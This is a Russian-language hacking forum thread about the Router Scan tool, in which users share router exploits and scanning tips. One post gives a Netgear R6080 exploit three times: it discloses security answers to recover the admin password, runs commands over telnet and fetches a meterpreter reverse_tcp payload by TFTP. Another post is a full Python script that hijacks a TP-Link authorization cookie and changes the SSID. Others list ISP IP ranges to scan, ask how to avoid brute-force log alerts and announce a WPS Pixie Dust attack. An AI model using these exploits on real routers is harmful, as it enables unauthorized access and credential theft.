Antichat — официальный сайт

прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    В формате CIDR? 0.0.0.0/0
     
    Kakoluk and sha9 like this.
    1. sha9

      sha9 Well-Known Member

      Joined:
      25 Sep 2015
      Messages:
      567
      Likes Received:
      734
      Reputations:
      2
      доброго времени суток.
      эксплойт на Netgear wifi router R6080 также применим и к JWNR2010v5 кому интересно.возможно может быть применим и к роутерскану (если его еще там нет.хотя вроде свеженькие уязвимости, но.....) :)
      == Security Questions Bypass > Answers Disclosure ==
      >> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
      <POST REQUEST>
      htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
      (replace)
      dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
      (by)
      dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
      <POST RESPONSE>
      <input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1">
      <input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2">
      (repeat recovery process for get admin password)

      для проверки на уязвимость можно поиграться
      http://IP/currentsetting.htm

      http://IP:56688/rootDesc.xml

      http://IP/401_recovery.htm

      полный список уязвимых параметров включая телнет и готовый эксплойт
      == Files Containing Juicy Info ==
      >> http://192.168.1.1/currentsetting.htm
      Firmware=V1.0.0.34WW
      Model=R6080
      >> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
      <serialNumber>SSSSSSSNNNNNN</serialNumber>

      == Security Questions Bypass > Answers Disclosure ==
      >> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
      <POST REQUEST>
      htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
      (replace)
      dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
      (by)
      dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
      <POST RESPONSE>
      <input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1">
      <input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2">
      (repeat recovery process for get admin password)

      == Authenticated Telnet Command Execution ==
      >> http://admin:[email protected]/setup.cgi?todo=debug
      :~$ telnet 192.168.1.1
      R6080 login: admin
      Password: Str0nG-!P4ssW0rD
      {
      upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
      download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
      }



      # Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure
      # Date: 13/07/2019
      # Exploit Author: Wadeek
      # Hardware Version: R6080-100PES
      # Firmware Version: 1.0.0.34 / 1.0.0.40
      # Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx
      # Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip)

      == Files Containing Juicy Info ==
      >> http://192.168.1.1/currentsetting.htm
      Firmware=V1.0.0.34WW
      Model=R6080
      >> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
      <serialNumber>SSSSSSSNNNNNN</serialNumber>

      == Security Questions Bypass > Answers Disclosure ==
      >> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
      <POST REQUEST>
      htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
      (replace)
      dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
      (by)
      dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
      <POST RESPONSE>
      <input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1">
      <input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2">
      (repeat recovery process for get admin password)

      == Authenticated Telnet Command Execution ==
      >> http://admin:[email protected]/setup.cgi?todo=debug
      :~$ telnet 192.168.1.1
      R6080 login: admin
      Password: Str0nG-!P4ssW0rD
      {
      upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
      download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
      }

      шодан дорк
      R6080

      прошу пардонить если баян.давно не был на форуме. подотстал от событий.
       
      #6982 sha9, 28 Oct 2019
      Last edited: 28 Oct 2019
      pta53-68bis, Triton_Mgn and CRACK211 like this.
      1. sha9

        sha9 Well-Known Member

        Joined:
        25 Sep 2015
        Messages:
        567
        Likes Received:
        734
        Reputations:
        2
        еще один интересный готовый эксплойт на туполинк TL-WR1043ND V2 от 10 октября 19 г.
        нет времени разбираться в деталях. но не сложный в отдельных запросах. может кто опробует уязвимости и отпишется

        import requests

        ascii = '''
        __________ __ _ __
        /_ __/ __ \ / / (_)___ / /__
        / / / /_/ /_____/ / / / __ \/ //_/
        / / / ____/_____/ /___/ / / / / ,<
        /_/ /_/ /_____/_/_/ /_/_/|_|

        '''
        print(ascii)
        Default_Gateway = raw_input("Enter your TP-Link router IP: ")

        # Constants
        url = 'http://'
        url2 = '/userRpm/LoginRpm.htm?Save=Save'
        full = url + Default_Gateway + url2
        # full = str(full)

        # The full GET request with the cookie authorization hijacked
        req_header = {
        'Host': '{}'.format(Default_Gateway),
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'Referer': 'http://{}/userRpm/LoginRpm.htm?Save=Save'.format(Default_Gateway),
        'Connection': 'close',
        'Cookie': '''Authorization=Basic%20QWRtaW5pc3RyYXRvcjpjM2JiNTI5NjdiNjVjYWY4ZWRkMWNiYjg4ZDcwYzYxMQ%3D%3D''',
        'Upgrade-Insecure-Requests': '1'
        }

        try:
        response = requests.get(full, headers=req_header).content
        except requests.exceptions.ConnectionError:
        print("Enter a valid Default Gateway IP address\nExiting...")
        exit()
        generate = response.split('/')[3] # Gets the randomized URL "session ID"


        option_1 = input("Press 1 to check if your TP-Link router is vulnerable: ")

        if option_1 is 1:

        if generate in response:
        print('Vulnerable!\n')
        option_2 = input('Press 2 if you want to change the router\'s SSID or any other key to quit: ')
        if option_2 is 2:
        newssid = raw_input('New name: ')
        ssid_url = '/userRpm/WlanNetworkRpm.htm?ssid1={}&ssid2=TP-LINK_660A_2&ssid3=TP-LINK_660A_3&ssid4=TP-LINK_660A_4&region=43&band=0&mode=5&chanWidth=2&channel=1&rate=83&speedboost=2&broadcast=2&brlssid=&brlbssid=&addrType=1&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save'.format(
        newssid)
        changessid_full = url + Default_Gateway + '/' + generate + ssid_url
        requests.get(changessid_full, headers=req_header)
        print('Changed to: {}'.format(newssid))
        else:
        ("Please choose the correct option.\nExiting...")
        exit()
        else:
        print('Not Vulnerable')
        exit()
        else:
        print("Please choose the correct option.\nExiting...")
        exit()
         
        WELK, Triton_Mgn and CRACK211 like this.
        1. conar

          conar Active Member

          Joined:
          23 Apr 2017
          Messages:
          156
          Likes Received:
          145
          Reputations:
          0
          QBR-1041AC пишет Unknown (MTSRouter)
           
          1. Solovey777

            Solovey777 New Member

            Joined:
            8 Nov 2019
            Messages:
            4
            Likes Received:
            0
            Reputations:
            0
            добавьте роутеров eltex побольше, ростелеком перешел на них
             
            1. TOX1C

              TOX1C Elder - Старейшина

              Joined:
              24 Mar 2012
              Messages:
              1,135
              Likes Received:
              1,931
              Reputations:
              24
              Эра ролтонскана потихоньку подходит к своему концу. Там, где пару лет назад, находились тысячи устройств, теперь едва 400 набирается. В локалках весь трафик порезан, на роутерах админки с заводскими небрутабельными паролями. И админок уже на некоторых аппаратах нет. Качай мудильное приложение, сканируй QR, в приложении и настраивай.
               
              1. brkt

                brkt New Member

                Joined:
                13 Nov 2019
                Messages:
                1
                Likes Received:
                0
                Reputations:
                0
                Добрый вечер. Скажите кто-нибудь, сканирую в Router Scan близ лежащие диапазоны, но нет ничего. Сталкивался кто с таким? Может кто подможет?
                D4:6E:0E:3C:5A:B1
                C0:4A:00:96:44:D6
                84:16:F9:20:48:24
                98:DE:D0:8F:E0:6E
                Белтелеком
                Буду очень признателен!
                 
                1. Valtasar

                  Valtasar New Member

                  Joined:
                  10 Oct 2016
                  Messages:
                  8
                  Likes Received:
                  0
                  Reputations:
                  0
                  " близ лежащие диапазоны " Гомеля
                  37.44.104.0-37.44.111.255
                  37.45.96.0-37.45.127.255
                  46.28.97.0-46.28.97.255
                  46.53.168.0-46.53.175.255
                  79.98.49.0-79.98.51.255
                  82.209.208.0-82.209.213.255
                  82.209.214.56-82.209.214.63
                  86.57.136.0-86.57.143.255
                  86.57.202.0-86.57.207.255
                  91.149.153.0-91.149.153.255
                  91.149.156.0-91.149.156.255
                  93.85.50.0-93.85.50.255
                  93.85.200.0-93.85.207.255
                  93.125.36.0-93.125.37.255
                  93.125.45.0-93.125.45.255
                  164.177.200.0-164.177.200.255
                  164.177.223.0-164.177.223.255
                  178.123.0.0-178.123.111.255
                  178.123.113.0-178.123.255.255
                  178.124.166.0-178.124.166.255
                  178.124.216.0-178.124.223.255
                  178.172.183.0-178.172.183.255
                  178.172.186.0-178.172.186.255
                  178.172.229.0-178.172.229.255
                  178.172.231.0-178.172.232.255
                  194.158.205.0-194.158.205.255
                   
                  1. Slayer

                    Slayer Member

                    Joined:
                    5 Nov 2016
                    Messages:
                    67
                    Likes Received:
                    8
                    Reputations:
                    0
                    Подскажите плиз, routerscan не вытаскивает данные с модели TP-LINK TL-WR841N (из внутренней сети роутера, подключение wi-fi) - вроде бы в руководстве указано наличие эксплойта, в чём может быть проблема?
                     
                    4Fun likes this.
                    1. TOX1C

                      TOX1C Elder - Старейшина

                      Joined:
                      24 Mar 2012
                      Messages:
                      1,135
                      Likes Received:
                      1,931
                      Reputations:
                      24
                      Эксплоит берет не все аппаратные версии этого роутера, и не все версии прошивок.


                      Если есть логин и пароль администратора, но роутерскан не может ничего вытянуть, стоит роутерскан обновить. Или попинать binarymaster a, в новых прошивках, где для входа требуется только пароль, даже с рабочим паролем роутерскан не может авторизоваться.
                       
                      4Fun, Payer and Slayer like this.
                      1. Slayer

                        Slayer Member

                        Joined:
                        5 Nov 2016
                        Messages:
                        67
                        Likes Received:
                        8
                        Reputations:
                        0
                        Спс, именно логин и пароль хотелось получить - прошивка с логином и паролем (жаль, что не все берёт). Ещё есть блокировка ввода логина после 10 неправильных попыток - подумал, может на этом спотыкается routerscan - он же вроде сначала пробует авторизоваться по списку логин:пароль.. Ещё порт ssh открыт..
                         
                        4Fun likes this.
                        1. Zhendos2302

                          Zhendos2302 New Member

                          Joined:
                          15 Mar 2016
                          Messages:
                          19
                          Likes Received:
                          2
                          Reputations:
                          0
                          Всем привет. Кто нибудь решил проблему awus036NHA Windows 10(драйвер установился сам):
                          В атаках на WPS ПИН при использовании alfa awus036nha[​IMG] я получал сообщение об ошибке:
                          [-] Failed to start raw packet capture.
                          [-] Try updating you
                          На встроенном wi-fi все работает.
                           
                          1. Zhendos2302

                            Zhendos2302 New Member

                            Joined:
                            15 Mar 2016
                            Messages:
                            19
                            Likes Received:
                            2
                            Reputations:
                            0
                            Просто стояла вин10 при покупке ноута, вроде норм винда. А строенный wi-fi я отключил и так, winpcap тож установлен.
                             
                            1. Toroid

                              Toroid Member

                              Joined:
                              9 Oct 2016
                              Messages:
                              92
                              Likes Received:
                              61
                              Reputations:
                              1
                              Попробуй WinPCAP переустановить. Кажется было что-то подобное, с альфой на ноуте, решал именно так.
                               
                              1. Zhendos2302

                                Zhendos2302 New Member

                                Joined:
                                15 Mar 2016
                                Messages:
                                19
                                Likes Received:
                                2
                                Reputations:
                                0
                                спасибо, переустановка winpcap дала положительный результат)
                                 
                                1. NovoxydonoceR

                                  NovoxydonoceR New Member

                                  Joined:
                                  27 Apr 2008
                                  Messages:
                                  7
                                  Likes Received:
                                  0
                                  Reputations:
                                  0
                                  Ребята какой параметр нужно указать в программе, чтоб в логах сканированных устройств, не было оповещений перебор паролей и т.д
                                   
                                  1. binarymaster

                                    binarymaster Elder - Старейшина

                                    Joined:
                                    11 Dec 2010
                                    Messages:
                                    4,717
                                    Likes Received:
                                    10,195
                                    Reputations:
                                    126
                                    Если такая фича когда-нибудь будет в RS, то я её точно платной сделаю. :rolleyes:
                                     
                                    Kakoluk, Piligrim740 and CRACK211 like this.
                                    1. robert

                                      robert Member

                                      Joined:
                                      9 Mar 2018
                                      Messages:
                                      9
                                      Likes Received:
                                      10
                                      Reputations:
                                      0
                                      Иногда, похожая проблема решается перетыканием в другой usb.
                                       
                                      1. robert

                                        robert Member

                                        Joined:
                                        9 Mar 2018
                                        Messages:
                                        9
                                        Likes Received:
                                        10
                                        Reputations:
                                        0
                                        Ага. И в Widows добавить кофемашину с тостером. Я за.....
                                         
                                        1. binarymaster

                                          binarymaster Elder - Старейшина

                                          Joined:
                                          11 Dec 2010
                                          Messages:
                                          4,717
                                          Likes Received:
                                          10,195
                                          Reputations:
                                          126
                                          Я вроде отвечал на этот вопрос ранее в этой теме. Режим монитора можно получить на некоторых адаптерах через Npcap + галка в установщике 802.11 monitor mode. Но там нет инъекций пакетов, популярные атаки реализовать не выйдет.

                                          В принципе можно заморочиться и прикрутить поддержку интерфейса airserv-ng, и подключаться RS'ом к линукс машине с вифием, но я пока до этого не дошёл. :D

                                          И ещё, сегодня я влил небольшое обновление для атаки на WPS. Теперь Router Scan сможет осуществлять атаку Pixie Dust сразу после M3 пакета, и завершать транзакцию по получению пин кода. Это должно помочь с некоторыми роутерами, которые дают только одну попытку на подключение по WPS.
                                           
                                          4Fun, Pirnazar, USER_X and 21 others like this.